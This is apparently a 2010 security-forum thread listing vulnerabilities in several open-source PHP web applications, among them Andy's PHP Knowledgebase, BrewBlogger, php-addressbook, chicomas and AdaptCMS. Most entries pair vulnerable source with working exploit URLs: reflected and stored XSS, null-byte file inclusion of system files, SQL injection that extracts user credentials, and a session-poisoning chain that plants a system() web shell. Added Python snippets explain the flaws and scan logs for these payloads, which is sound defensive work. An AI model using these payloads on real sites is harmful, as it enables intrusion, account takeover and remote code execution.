05.02.2010, 23:24
Andy's PHP Knowledgebase v0.94.2
http://aphpkb.org/
forgot_password.php
PHP code:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/forgot_password.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
keysearch.php
PHP code:
if($_REQUEST['keyword_list']){
$keyword_list = escdata($_REQUEST['keyword_list']);
} else {
$keyword_list = 'nothing';
}
...
// If it's not the first page, make a Previous button.
if ($current_page != 1) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> ';
}
// Make all the numbered pages.
for ($i = 1; $i <= $num_pages; $i++) {
if ($i != $current_page) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> ';
} else {
echo $i . ' ';
}
}
// If it's not the last page, make a Next button.
if ($current_page != $num_pages) {
echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>';
}
pXSS
http://localhost/aphpkb/keysearch.php
post keyword_list=1<script>alert(121212)</script>
-------------------------------------------------------------
login.php
PHP code:
<p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p>
pXSS
http://localhost/aphpkb/login.php
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
q.php
PHP code:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
echo "<p>Question:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/q.php
post article=1<div+style+STYLE="width:expression(alert( 121212))%3B">&aid=111&submit=Submit%20Question
-------------------------------------------------------------
register.php
PHP code:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p>
<p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p>
<p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p>
<p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p>
pXSS
http://localhost/aphpkb/register.php
post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script
post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script>
post email=1>"><script%20%0a%0d>alert(121212)%3B</script>
post username=1>"><script%20%0a%0d>alert(121212)%3B</script>
-------------------------------------------------------------
saa.php
PHP code:
$articledatae = escdata(xss_clean($_POST['article']) );
...
$articledata = stripslashes($articledatae);
echo '<p>Article Details</p>';
if($titlee) { echo "<p>Title: $titlee</p>"; }
echo "<p>Article:<br />$articledata</p>";
pXSS
http://localhost/aphpkb/saa.php
post article=1<div+style="width:expression(alert(121212 ))%3B">
06.02.2010, 23:16
Angora Guestbook v1.2.1
http://sourceforge.net/projects/aguestbook/
index.php
PHP code:
// Language settings
$langName = secureVar($_GET['l'], 'html');
if (! empty($langName))
$_SESSION['langName'] = $langName;
if (empty($_SESSION['langName']))
$langName = $config['guestbookLang'];
else
$langName = $_SESSION['langName'];
@include_once "languages/" . $langName . "/frontend.php";
classes/functions.php
PHP code:
function secureVar($var, $type) {
global $con;
switch ($type) {
case 'sql' :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
break;
case 'html' :
$var = htmlspecialchars($var, ENT_QUOTES);
break;
default :
if (get_magic_quotes_gpc())
$var = stripslashes($var);
if (function_exists("mysql_real_escape_string"))
$var = mysql_real_escape_string($var);
else
$var = addslashes($var);
}
return $var;
}
LFI
mq=off
http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00
------------------------
admin/includes/content/phpinfo.php
PHP code:
if (@$magic != "0xDEADBEEF")
die("This file cannot be executed directly");
if (base64_decode($_SESSION['privilege']) != 1) {
$error = new Error($lang['noPermission']);
die($error->showError());
}
ob_start();
phpinfo();
phpinfo
http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==
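Added example (not Angora's code) showing why secureVar($var, 'html') is the wrong control for the include in index.php: htmlspecialchars leaves '.', '/' and a NUL byte untouched, so the built path walks out of languages/; the defender's version only selects among known names and never builds a path from the request. Python stand-ins; the language list is constructed.

```python
from __future__ import annotations

import html
import posixpath

# Languages shipped under languages/ (constructed list for this example)
ALLOWED_LANGUAGES = frozenset({"en", "de", "tr"})
LANGUAGES_DIR = "languages"


def secure_var_html(value: str) -> str:
    """Python counterpart of secureVar($var, 'html'): htmlspecialchars with ENT_QUOTES.

    It rewrites & < > " ' only; path separators, '..' and NUL pass through.
    """
    return html.escape(value, quote=True)


def include_path_as_shipped(lang_param: str) -> str:
    """The path index.php builds from the HTML-escaped ?l= value.

    PHP of that era stopped the filename at the first NUL byte, so the
    trailing '/frontend.php' was dropped and an arbitrary file was included.
    """
    return LANGUAGES_DIR + "/" + secure_var_html(lang_param) + "/frontend.php"


def escapes_base_dir(path: str, base: str) -> bool:
    """True if the normalised path leaves base/ (pure string check, no disk access)."""
    norm = posixpath.normpath(path)
    return not (norm == base or norm.startswith(base + "/"))


def resolve_language_file(lang_param: str) -> str | None:
    """Defender's version: the request may only choose a known name, never a path."""
    if lang_param not in ALLOWED_LANGUAGES:
        return None
    return f"{LANGUAGES_DIR}/{lang_param}/frontend.php"


if __name__ == "__main__":
    hostile = "../../../../../../../../boot.ini\x00"
    print(repr(include_path_as_shipped(hostile)))          # escaped value is unchanged
    print(escapes_base_dir(include_path_as_shipped(hostile), LANGUAGES_DIR))  # True
    print(resolve_language_file(hostile), resolve_language_file("en"))
```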
07.02.2010, 17:10
Product: mycroCMS
Site: http://sourceforge.net/projects/mycrocms/
Path disclosure
Code:
http://localhost/mycrocms/?entry_id='
LFI
Code fragment in /admin/admin.php:
PHP code:
if ($admin=="error"){
include ("error.php");
}elseif ($userManager->isLoggedIn()) {
if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");
} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());
} else {
if ($admin == "") {
include ("dashboard.php");
} else {
if (file_exists("admin/$admin.php")) {
include ("admin/$admin.php");
} else {
die("File admin/$admin.php does not exist!");
}
}
$userManager->setLastTime(time());
}
The include comes from here. Exploitation:
Code:
http://localhost/mycrocms/?admin=../../../../../../etc/passwd%00
(admin rights are not needed)
SQL-Injection
magic_quotes=Off
Look at \include\Categories.php:
PHP code:
function get_category_by_id($id) {
global $sql, $categories;
// use array if preloaded
if (is_array($categories)) {
$res = array_search_recursive('category_id', $id, $categories);
}
if (!is_array($res[0])) {
$res = $sql->read('categories', 'category_id', $id);
}
return $res[0];
}
Now we look for the read method in the sql class. I won't paste all the code, but there is no filtering there.
PHP code:
$sql = "SELECT * FROM `$tablep` " . $where . $order . $limit;
$result = mysql_query($sql);
Exploitation example:
Code:
http://localhost/mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat(version(),0x3a,floor(rand()*2))+x+from+mysql.user+group+by+x+limit+1)+and+'a'='a
Code Execution
Uploading a shell through the admin panel. Go to the Plugins menu; there is a standard plugin called second for editing templates (in fact, any files). Activate it, then go to http://localhost/mycrocms/?plugin=second&page=themes and edit any file.
08.02.2010, 10:26
Pyrophobia CMS
Product : http://sourceforge.net/projects/pyrophobia/
Version : Pyrophobia CMS 2.1.3.1
Active XSS
1. Forum -- go to the forum -- post a message with the text ( "><script>alert("xss");</script> )
2. PM -- Send User a PM -- send the text ( '"/><script>alert("xss");</script> )
SQL injection
MySQL Version : 5.0.45 ---
Code:
http://localhost/[version]/?act=downloads/browsecategory&cat=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Code:
http://localhost/[version]/index.php?act=UCP&CODE=02&mssg=3'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
There are many of them in this engine.
LFI
milw0rm
10.02.2010, 23:50
BrewBlogger v2.3.1
http://www.brewblogger.net/
path disclosure
http://localhost/brewblogger/includes/plug-ins.inc.php
----------------------
index.php
PHP code:
//image dir / SQL information and connect to MySQL server
require_once ('Connections/config.php');
//choose SQL table and set up functions to user authentication and
//navbar configuration for login/logout links
require ('includes/authentication_nav.inc.php'); session_start();
includes\authentication_nav.inc.php
$query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername);
$user = mysql_query($query_user, $brewing) or die(mysql_error());
$row_user = mysql_fetch_assoc($user);
$totalRows_user = mysql_num_rows($user);
Blind SQL
mq=off
http://localhost/brewblogger/index.php?loginUsername='+UNION+SELECT+(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a)+--+
-----------------------
includes/db_connect_log.inc.php
PHP code:
/* set pagination variables */
if ($view == "limited") $display = 25;
elseif ($view == "all") $display = 9999999;
$pg = (isset($_REQUEST['pg']) && ctype_digit($_REQUEST['pg'])) ? $_REQUEST['pg'] : 1;
$start = $display * $pg - $display;
if (($row_pref['mode'] == "1") || (($row_pref['mode'] == "2") && ($filter == "all"))) {
mysql_select_db($database_brewing, $brewing);
$query_result = "SELECT count(*) FROM brewing";
if ($style != "all") $query_result .= " WHERE brewStyle='$style' AND"; else $query_result .= " WHERE";
$query_result .= " NOT brewArchive='Y'";
$result = mysql_query($query_result, $brewing) or die(mysql_error());
$total = mysql_result($result, 0);
$query_log = "SELECT * FROM brewing";
if ($style != "all") $query_log .= " WHERE brewStyle='$style' AND"; else $query_log .= " WHERE";
$query_log .= " NOT brewArchive='Y'";
$query_log .= " ORDER BY $sort $dir LIMIT $start, $display";
$sort is slash-escaped earlier,
PHP code:
includes/url_variables.inc.php
$sort = "brewDate";
if (isset($_GET['sort'])) {
$sort = (get_magic_quotes_gpc()) ? $_GET['sort'] : addslashes($_GET['sort']);
}
$display is not filtered at all. It would be nice to get a limit union select, but order by gets in the way, so only
Blind SQL
http://localhost/brewblogger/index.php?page=brewBlogList&&sort=(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a)
----------------------
sections.entry.inc.php
PHP code:
$dbTable = "brewing";
if (isset($_GET['dbTable'])) {
$dbTable = (get_magic_quotes_gpc()) ? $_GET['dbTable'] : addslashes($_GET['dbTable']);
}
if ($action == "default") {
$style = "default";
if (isset($_GET['style'])) {
$style = (get_magic_quotes_gpc()) ? $_GET['style'] : addslashes($_GET['style']);
}
}
else
$style = $_POST['style'];
if (($action == "verify") || ($action == "print")) {
$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$homePhone = $_POST['homePhone'];
$workPhone = $_POST['workPhone'];
$email = $_POST['email'];
$brewClub = $_POST['brewClub'];
$brewName = $_POST['brewName'];
$still = $_POST['still'];
$dry = $_POST['dry'];
$hydromel = $_POST['hydromel'];
$petillant = $_POST['petillant'];
$semi = $_POST['semi'];
$standard = $_POST['standard'];
$sweet = $_POST['sweet'];
$sparkling = $_POST['sparkling'];
$sack = $_POST['sack'];
$special = $_POST['special'];
$waterTreatment = $_POST['waterTreatment'];
$yeastLiquid = $_POST['yeastLiquid'];
$yeastDried = $_POST['yeastDried'];
$starter = $_POST['starter'];
$yeastNutrients = $_POST['yeastNutrients'];
$carbonation = $_POST['carbonation'];
$volumeC02 = $_POST['volumeC02'];
$primingSugar = $_POST['primingSugar'];
$bottlingDate = $_POST['bottlingDate'];
$finingsType = $_POST['finingsType'];
$finingsAmount = $_POST['finingsAmount'];
}
mysql_select_db($database_brewing, $brewing);
$query_log = sprintf("SELECT * FROM $dbTable WHERE id = '%s'", $id);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);
$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
SQL
mq=off
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default
post
style=-1' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(concat_ws(0x3a,user_name,password))) from users --
pXSS
for the fields
name
address
city
state
zip
homePhone
workPhone
email
brewClub
brewName
still
dry
hydromel
petillant
semi
standard
sweet
sparkling
sack
special
waterTreatment
yeastLiquid
yeastDried
starter
yeastNutrients
carbonation
volumeC02
primingSugar
bottlingDate
finingsType
finingsAmount
of the form
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default
post
city=<script>alert(121212)</script>
Last edited by nikp; 10.02.2010 at 23:58.
11.02.2010, 21:43
php-addressbook v5.4.6 - r276
http://sourceforge.net/projects/php-addressbook/
group.php
PHP code:
echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>";
...
<form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
pXSS
http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script>
pXSS
mq=off
http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script>
---------------------
include/dbconnect.php
PHP code:
$get_vars = array( 'id' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = intval($_GET[$get_var]);
} elseif(isset($_POST[$get_var])) {
${$get_var} = intval($_POST[$get_var]);
} else {
${$get_var} = null;
}
}
echo $id, "<br />";
// Copy only used variables into global space.
$get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber'
, 'submit', 'update', 'delete'
, 'new', 'add', 'remove', 'edit' );
foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = mysql_real_escape_string($_GET[$get_var], $db);
} elseif(isset($_POST[$get_var])) {
${$get_var} = mysql_real_escape_string($_POST[$get_var], $db);
} else {
${$get_var} = null;
}
}
...
// To run the script on systeme with "register_globals" disabled,
// import all variables in a bit secured way: Remove HTML Tags
foreach($_REQUEST as $key => $value)
{
// Allow all tags in headers and footers
if($key == "group_header" || $key == "group_footer"){
${$key} = $value;
// Handle arrays
} elseif(is_array($value)) {
foreach($value as $entry)
{
${$key}[] = strip_tags($entry);
}
// Handle the rest
} else {
// ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters
${$key} = strip_tags($value);
}
// TBD: prevent SQL-Injection
}
...
// ------------------- Group query handling ------------------------
//
$select_groups = "SELECT groups.*
, parent_groups.group_name parent_name
, parent_groups.group_id parent_id
FROM $table_groups AS groups
LEFT JOIN $table_groups AS parent_groups
ON groups.group_parent_id = parent_groups.group_id";
group.php
PHP code:
// Open for Editing
else if($edit || $id)
{
if($edit) $id = $selected[0];
if(! $read_only)
{
$result = mysql_query("$select_groups WHERE groups.group_id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+
-------------------------
edit.php
PHP code:
else if($id)
{
if(! $read_only)
{
$result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
Last edited by nikp; 11.02.2010 at 22:02.
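Added illustration (not php-addressbook's code) of why the intval() in include/dbconnect.php does not protect the group.php and edit.php queries: the later blanket foreach over $_REQUEST reassigns $id with the merely tag-stripped value, so the order of the two import passes decides what reaches mysql_query. Python emulation; php_intval and php_strip_tags are simplified stand-ins for the PHP functions.

```python
from __future__ import annotations

import re

INT_VARS = ("id",)  # the typed variables dbconnect.php passes through intval()


def php_intval(value: str) -> int:
    """Simplified stand-in for PHP's intval(): leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def php_strip_tags(value: str) -> str:
    """Simplified stand-in for strip_tags(): drop anything that looks like a tag."""
    return re.sub(r"<[^>]*>", "", value)


def import_as_shipped(request: dict[str, str]) -> dict[str, object]:
    """Order used in dbconnect.php: typed pass first, blanket pass second."""
    scope: dict[str, object] = {}
    for var in INT_VARS:
        scope[var] = php_intval(request[var]) if var in request else None
    for key, value in request.items():       # the register_globals replacement loop
        scope[key] = php_strip_tags(value)   # silently overwrites the intval()'d $id
    return scope


def import_hardened(request: dict[str, str]) -> dict[str, object]:
    """Same two passes, but the blanket pass never touches a typed variable."""
    scope: dict[str, object] = {}
    for key, value in request.items():
        if key not in INT_VARS:
            scope[key] = php_strip_tags(value)
    for var in INT_VARS:
        scope[var] = php_intval(request[var]) if var in request else None
    return scope


def group_query(scope: dict[str, object]) -> str:
    """The concatenation from group.php, to compare what would reach MySQL."""
    return f"SELECT groups.* FROM groups WHERE groups.group_id={scope['id']}"


if __name__ == "__main__":
    req = {"id": "-1 union select 1,2,3,4,version(),6,7,8,9 -- ", "group": "staff"}
    print(group_query(import_as_shipped(req)))   # injected text survives
    print(group_query(import_hardened(req)))     # ...group_id=-1
```

The hardened import only shows that sanitisation order matters; the actual fix for these queries is a parameterised statement rather than string concatenation.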
18.02.2010, 22:45
cms chicomas Ver : 2.0.4
http://sourceforge.net/projects/chicomas/
functions.php
PHP code:
function SetLanguage() {
global $defaultlanguage;
$obj_language = new CLanguage();
$obj_languagearray = new CLanguageArray();
$obj_languageengine = new CLanguageEngine();
if (!$_REQUEST['lang']){
// No change request of language
if (!session_is_registered("lang")){
//No Registered
$lang = $defaultlanguage;
session_register("lang");
$_SESSION['lang'] = $lang;
}
else{
//Registered
}
}
else{
//Change request of language
$lang = $_REQUEST['lang'];
$obj_language = $obj_languageengine->GetLanguage($lang);
if ($obj_language!=null){
if (session_is_registered("lang")){
$_SESSION['lang'] = $lang;
}
else{
if ($lang =="")
$lang = $defaultlanguage;
session_register("lang");
}
}
}
$lang = $_SESSION['lang'];
switch (strtolower($lang)){
default:
case "tr":
$charset = "iso-8859-9";
break;
case "en":
$charset = "iso-8859-1";
break;
case "de":
$charset = "iso-8859-1";
break;
}
if (session_is_registered("charset")){
$_SESSION['charset'] = $charset;
}
else{
if ($charset =="")
$charset = "iso-8859-9";
session_register("charset");
}
//Include Language File
include("languages/".strtolower($_SESSION['lang'])."/language.php");
}
If $obj_language = $obj_languageengine->GetLanguage($lang); returns a non-empty result,
the value $lang = $_REQUEST['lang']; is stored in the session and is then included by
include("languages/".strtolower($_SESSION['lang'])."/language.php");
let's look at
objects/obj_languages.php
PHP code:
class CLanguageEngine {
function GetLanguages($active){
$o_dataaccess = new CDataAccess();
return $o_dataaccess->GetLanguages($active);
objects/obj_dataaccess.php
PHP code:
function GetLanguage($lang) {
$sql = "SELECT * FROM languages ";
$sql .= "WHERE lang='".strtolower($lang)."' ";
$sql .= "AND active='1'";
//echo "SQL:".$sql."<br>";
$db = new db();
$db->db_connect();
if ($db->is_connected()){
$db->db_query($sql);
while ($row = $db->get_row()) {
$o_language = new CLanguage($row);
}
$db->db_disconnect();
}
return $o_language;
}
with mq=off
SQL
http://localhost/chicomas/index.php?lang=en'+union+select+1,2,3,4,version(),6+--+
SQL+LFI
http://localhost/chicomas/index.php?lang=/../../../../../../../boot.ini%00'+union+select+1,2,3,4,5,6+--+
Shell
if we have found the session, we get a shell, for example like this: (using two different browsers)
opera: put the shell into the session
http://localhost/chicomas/index.php?lang='+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,5,6+--+
firefox: include the session
http://localhost/chicomas/index.php?lang=/../../../../../../../Server/PHP/TMP/sess_be2c81ce822253b08bfa181ee5b7cf9d%00'+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,version(),6+--+&pass=dir
-------------------
tools/mysqlbackuppro/index.php
PHP code:
/*
* Locale Setting
*/
$locale = gonxlocale::init();
if (!isset($locale) or $locale=="") {
$locale = $GonxAdmin["locale"];
}
require_once("locale/".$locale.".php");
tools/mysqlbackuppro/libs/locale.class.php
PHP code:
class gonxlocale{
/**
* Constructor
* @access protected
*/
function locale(){
}
/**
*
* @access public
* @return void
**/
function init(){
global $locale,$GonxAdmin,$HTTP_SESSION_VARS;
if (session_is_registered('gonxlocale') and !isset($_GET["locale"])) {
$locale = $HTTP_SESSION_VARS["gonxlocale"];
} elseif (!isset($_GET["locale"])) {
$locale = $GonxAdmin["locale"];
session_register('gonxlocale');
$gonxlocale = $locale;
} elseif (isset($_GET["locale"])) {
if (is_file("locale/".$_GET["locale"].".php")) {
session_register('gonxlocale');
$HTTP_SESSION_VARS["gonxlocale"] = $_GET["locale"];
}
}
return $locale;
}
LFI
mq=off
http://localhost/chicomas/tools/mysqlbackuppro/index.php?locale=../../../../../../boot.ini%00
Last edited by nikp; 19.02.2010 at 20:48.
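A detection example added here (not from the thread): a small scanner over access-log lines that normalises the request target (URL-decoding, /**/ comments to spaces) and tags the payload shapes seen in this thread, such as the null-byte LFI, traversal, UNION and name_const()/row() error-based SQL injection, script tags and PHP tags in a parameter like the session-shell chain above. The log lines are constructed; the rule names and the log format are assumptions.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style); the request targets
# are modelled on the payload shapes discussed in this thread, not copied from it.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Feb/2010:01:56:01 +0300] "GET /guestbook/index.php?l=en HTTP/1.1" 200 4021
10.0.0.5 - - [21/Feb/2010:01:56:02 +0300] "GET /guestbook/index.php?l=../../../../../../../../boot.ini%00 HTTP/1.1" 200 612
10.0.0.5 - - [21/Feb/2010:01:56:03 +0300] "GET /chicomas/index.php?lang=en'+union+select+1,2,3,4,version(),6+--+ HTTP/1.1" 200 3310
10.0.0.5 - - [21/Feb/2010:01:56:04 +0300] "GET /mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat(version(),0x3a,floor(rand()*2))+x+from+mysql.user+group+by+x+limit+1)+and+'a'='a HTTP/1.1" 500 902
10.0.0.5 - - [21/Feb/2010:01:56:05 +0300] "GET /pyro/?act=downloads/browsecategory&cat=1'/**/union/**/select/**/1,NAME_CONST((version()),14),3 HTTP/1.1" 500 788
10.0.0.5 - - [21/Feb/2010:01:56:06 +0300] "GET /adaptcms_lite_1.5/?cat=1'+%3E%3Cscript%3Ealert(121212);%3C/script%3E HTTP/1.1" 200 5120
10.0.0.5 - - [21/Feb/2010:01:56:07 +0300] "GET /chicomas/index.php?lang='+union+select+1,%3C?if($_GET[pass])system($_GET[pass]);?%3E,3,4,5,6+--+&pass=dir HTTP/1.1" 200 3310
"""

# Each rule is applied to the decoded, comment-normalised request target.
RULES = {
    "null_byte": re.compile(r"\x00"),
    "path_traversal": re.compile(r"(?:\.\./){2,}"),
    "sql_union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    "sql_error_based": re.compile(
        r"\bname_const\s*\(|\brow\s*\(\s*\d+\s*,\s*\d+\s*\)\s*>", re.IGNORECASE),
    "html_script": re.compile(r"<\s*script\b", re.IGNORECASE),
    "php_tag": re.compile(r"<\?(?:php\b|=|[a-z])", re.IGNORECASE),
}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalise_target(target: str) -> str:
    """URL-decode once (%00 -> NUL, + -> space) and turn /**/ comments,
    which MySQL accepts as whitespace, into real spaces so word rules match."""
    decoded = unquote_plus(target)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def classify_target(target: str) -> set[str]:
    """Names of every rule that fires on one request target."""
    text = normalise_target(target)
    return {name for name, rx in RULES.items() if rx.search(text)}


def scan_log(log_text: str) -> list[tuple[int, str, set[str]]]:
    """(line number, raw target, tags) for every request that triggers a rule."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        tags = classify_target(m.group("target"))
        if tags:
            findings.append((lineno, m.group("target"), tags))
    return findings


if __name__ == "__main__":
    for lineno, target, tags in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {sorted(tags)}  {target[:60]}")
```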
21.02.2010, 01:56
AdaptCMS Lite v1.5 - NEW
www.adaptcms.com
pXSS
mq=off
http://localhost/adaptcms_lite_1.5/index.php
post
skin=1>"><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script>
-----------------------
index.php
PHP code:
$_GET['id'] = str_replace("/","",stripslashes(check($_GET['id'])));
$sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'");
functions.php
PHP code:
function check($val) {
// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);
// straight replacements, the user should never need these since they're normal characters
// this prevents like <IMG SRC=@avascript:alert('XSS')>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search .= '1234567890!@#$%^&*()';
$search .= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
// ;? matches the ;, which is optional
// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
// @ @ search for the hex values
$val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
// @ @ 0{0,7} matches '0' zero to seven times
$val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
}
// now the only remaining whitespace attacks are \t, \n, and \r
$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img');
$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra = array_merge($ra1, $ra2);
$found = true; // keep replacing as long as the previous round replaced something
while ($found == true) {
$val_before = $val;
for ($i = 0; $i < sizeof($ra); $i++) {
$pattern = '/';
for ($j = 0; $j < strlen($ra[$i]); $j++) {
if ($j > 0) {
$pattern .= '(';
$pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
$pattern .= '|(&#0{0,8}([9][10][13]);?)?';
$pattern .= ')?';
}
$pattern .= $ra[$i][$j];
}
$pattern .= '/i';
$replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
$val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
if ($val_before == $val) {
// no replacements were made, so exit the loop
$found = false;
}
}
}
return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>");
}
SQL
mq=off
http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+
-------------------------------------
index.php
PHP code:
...
if ($_GET['field'] or $_GET['data']) {
$sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim);
} else {
if ($_GET['abc']) {
if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
}
} else {
